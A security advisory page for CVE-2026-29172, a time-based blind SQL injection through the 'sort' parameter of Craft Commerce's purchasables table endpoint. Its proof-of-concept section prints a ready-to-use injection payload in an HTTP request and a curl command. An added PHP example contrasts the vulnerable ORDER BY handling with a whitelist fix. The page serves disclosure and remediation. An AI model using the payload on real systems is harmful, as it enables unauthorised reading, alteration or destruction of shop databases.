CVE-2026-29172

EPSS 0.01%

Craft Commerce is Vulnerable to SQL Injection in Commerce Purchasables Table Sorting

Published: 2026/3/10  Modified: 2026/3/13

Description

## Summary

Craft Commerce is vulnerable to **SQL Injection** in the purchasables table endpoint. The `sort` parameter is split on `|` and the first part (the column name) is used directly as an array key for `orderBy()` with no whitelist validation. Yii2's query builder passes such keys through `quoteColumnName()`, which returns any name containing `(` unquoted (it is treated as an expression), so a value with parentheses reaches the `ORDER BY` clause verbatim and an authenticated attacker can inject arbitrary SQL there.

---

## PoC

### Required Permissions

- General
  - Access the control panel
  - Access Craft Commerce
- Craft Commerce
  - Manage orders
  - Edit orders

### Steps to reproduce

1. Log in to the control panel.
2. Navigate to **Commerce** > **Orders** > Create a new order.
3. Click "Add a line item" to show the purchasables table.
4. Intercept the AJAX request and modify the `sort` parameter as follows:

   ```http
   GET /index.php?p=admin/actions/commerce/orders/purchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(2))|asc
   ```

5. Observe the delay in the response, confirming the injection.

Alternatively, use the following `curl` command (bash syntax; replace the cookie and target domain as needed). This variant uses `SLEEP(5)`, so expect a correspondingly longer delay:

```bash
curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin%2Factions%2Fcommerce%2Forders%2Fpurchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(5))|asc'
```

### Impact

With this blind SQLi, an attacker can:

- **Exfiltrate data** character-by-character (same technique as [GHSA-pmgj-gmm4-jh6j](https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j)).
- **Modify or destroy data** (drop tables, update records, alter schema).
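The following is an added example, not code from Craft Commerce or Yii2. It models the `sort=column|direction` handling the advisory describes: a stand-in for Yii2's `quoteColumnName()` shows why the PoC payload survives quoting and lands in `ORDER BY` verbatim, and a whitelisted variant shows the fix. The function names, the `ALLOWED_SORT_COLUMNS` list and the back-quote (MySQL) quoting are assumptions for illustration, not the project's real identifiers or table schema.

```php
<?php
// Added example; not Craft Commerce or Yii2 code.
// Shows how an unvalidated "column|direction" sort value reaches ORDER BY,
// why Yii2-style quoting does not stop the PoC payload, and a whitelist fix.

// Simplified stand-in for yii\db\Schema::quoteColumnName(): a name that
// contains "(" or "[[" is returned verbatim (treated as an expression);
// anything else is back-quoted. MySQL quoting is assumed here.
function quoteColumnNameLikeYii(string $name): string
{
    if (strpos($name, '(') !== false || strpos($name, '[[') !== false) {
        return $name; // expression passthrough: this is what the payload exploits
    }
    return '`' . str_replace('`', '``', $name) . '`';
}

// Vulnerable shape (mirrors the advisory): split on "|" and use the first
// part as the orderBy() key with no validation.
function buildOrderByVulnerable(string $sort): string
{
    [$column, $direction] = array_pad(explode('|', $sort, 2), 2, 'asc');
    $dir = strtolower($direction) === 'desc' ? 'DESC' : 'ASC';
    return 'ORDER BY ' . quoteColumnNameLikeYii($column) . ' ' . $dir;
}

// Hardened shape: only columns from a fixed allow-list may be sorted on, and
// the direction is normalised to one of two constants. Column names are
// assumed for illustration; the real purchasables table may differ.
const ALLOWED_SORT_COLUMNS = ['id', 'title', 'sku', 'price'];

function buildOrderBySafe(string $sort): ?string
{
    [$column, $direction] = array_pad(explode('|', $sort, 2), 2, 'asc');
    if (!in_array($column, ALLOWED_SORT_COLUMNS, true)) {
        return null; // reject: caller falls back to a default sort or returns 400
    }
    $dir = strtolower($direction) === 'desc' ? 'DESC' : 'ASC';
    return 'ORDER BY ' . quoteColumnNameLikeYii($column) . ' ' . $dir;
}

// Constructed inputs: a legitimate sort and the advisory's PoC payload.
$inputs = ['id|asc', 'id,(SELECT SLEEP(2))|asc'];
foreach ($inputs as $sort) {
    printf("%-26s vulnerable: %s\n", $sort, buildOrderByVulnerable($sort));
    printf("%-26s safe:       %s\n", $sort, buildOrderBySafe($sort) ?? 'rejected');
}
```

Running this with `php` prints `ORDER BY id,(SELECT SLEEP(2)) ASC` for the vulnerable path, i.e. the subquery is emitted unquoted because of the parenthesis passthrough, while the whitelisted path rejects the same input and accepts only `id|asc`. The point for a fix is that quoting alone is not a defence for identifiers taken from user input; the column must be matched against a closed list before it is handed to `orderBy()`.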

Affected packages (1)

CVSS score

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 4.0 | | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |

References (5)